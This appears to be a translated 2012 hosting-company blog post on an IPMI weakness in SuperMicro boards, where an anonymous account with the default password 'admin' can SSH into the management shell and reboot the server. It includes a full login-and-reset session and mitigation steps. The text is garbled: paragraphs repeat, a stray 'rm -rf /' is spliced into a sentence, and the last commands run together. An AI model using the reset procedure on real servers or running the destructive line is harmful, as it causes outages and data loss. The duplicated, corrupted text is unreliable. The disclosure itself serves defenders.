May 29, 2012 at 19:43IPMI - vulnerability in shell v. 1.00 allows you to restart the server
Welcome dear Khabrovites! From now on, the GlobaTel
team will try to please you with informative articles in the field of hosting and Data Centers, and also sometimes publish our achievements purely from a technical point of view. Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI . One of our clients complained that a brand new server with xeon E3 from a well-known Russian brand reboots very often. Going to the IPMI server, we saw an actively typing team . Whoever saw this will understand. They pulled out the power cord - went with a netbook to set up the server and figure out what's what.
I must say right away that we solved this problem by blocking all IPMI IP. Access to them is now issued only for IP clients upon prior request.
The issue is closed in shell version 1.00.
We show part of the tricks (server reboot) that can be cranked up. The ability to connect to IPMI via SSH is not known to everyone. It is this feature that allows you to restart the server. It turns out that through the web interface you cannot change the password for anonymouse, which has a standard admin password and which for some reason can restart the machine via SSH.
Here is a list of commands when connecting to IPMI via SSH: Ping the server: As you can see, there is no ping, the server restarts.
Addition - the problem relates to IPMI 2.0 (not bios) version 1.00 for SuperMicro motherboards X8 and X9 series and dual-processor boards for Xeon 56xx series processors. Anonymouse
user must be turned off via ipmitool.
Listing for installing on Linux: Command to disable anonymouse:
team will try to please you with informative articles in the field of hosting and Data Centers, and also sometimes publish our achievements purely from a technical point of view. Today I would like to start with a simple but very important article about how we came across a glaring hole in IPMI . One of our clients complained that a brand new server with xeon E3 from a well-known Russian brand reboots very often. Going to the IPMI server, we saw an actively typing team . Whoever saw this will understand. They pulled out the power cord - went with a netbook to set up the server and figure out what's what.
rm -rf /I must say right away that we solved this problem by blocking all IPMI IP. Access to them is now issued only for IP clients upon prior request.
The issue is closed in shell version 1.00.
We show part of the tricks (server reboot) that can be cranked up. The ability to connect to IPMI via SSH is not known to everyone. It is this feature that allows you to restart the server. It turns out that through the web interface you cannot change the password for anonymouse, which has a standard admin password and which for some reason can restart the machine via SSH.
Here is a list of commands when connecting to IPMI via SSH: Ping the server: As you can see, there is no ping, the server restarts.
Password of anonymous: admin
# ssh -o PreferredAuthentications=password,keyboard-interactive -l "" IPMI
@IPMI's password:
Auth User/Pass with PS...pass.
ATEN SMASH-CLP System Management Shell, version 1.00
Copyright (c) 2008-2009 by ATEN International CO., Ltd.
All Rights Reserved
-> show
/
Targets :
system1
Properties :
None
Verbs :
cd
show
help
version
exit
-> cd system1
/system1
-> show /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
Targets :
none
Properties :
Name=IPMI Power Service
CreationClassName=IPMI_PowerManagementService
ElementName=Server Power Management Service
EnabledState=5
RequestedState=12
EnabledDefault=2
PowerState=1
Verbs :
cd
show
help
version
exit
start
stop
reset
-> reset /system1/pwrmgtsvc1
/system1/pwrmgtsvc1
reset done...
ping IpOfServer
Pinging IpOfServer with 32 bytes of data:
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Reply from IpOfServer: Destination host unreachable.
Ping statistics for IpOfServer:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Addition - the problem relates to IPMI 2.0 (not bios) version 1.00 for SuperMicro motherboards X8 and X9 series and dual-processor boards for Xeon 56xx series processors. Anonymouse
user must be turned off via ipmitool.
Listing for installing on Linux: Command to disable anonymouse:
wget ftp.supermicro.com/utility/IPMICFG/Linux/IPMICFG-Linux_v1.41.zip
unzip IPMICFG-Linux_v1.41.zip
cd IPMICFG-Linux_v1.41_110706/
chmod 755 *ipmitool user disable 1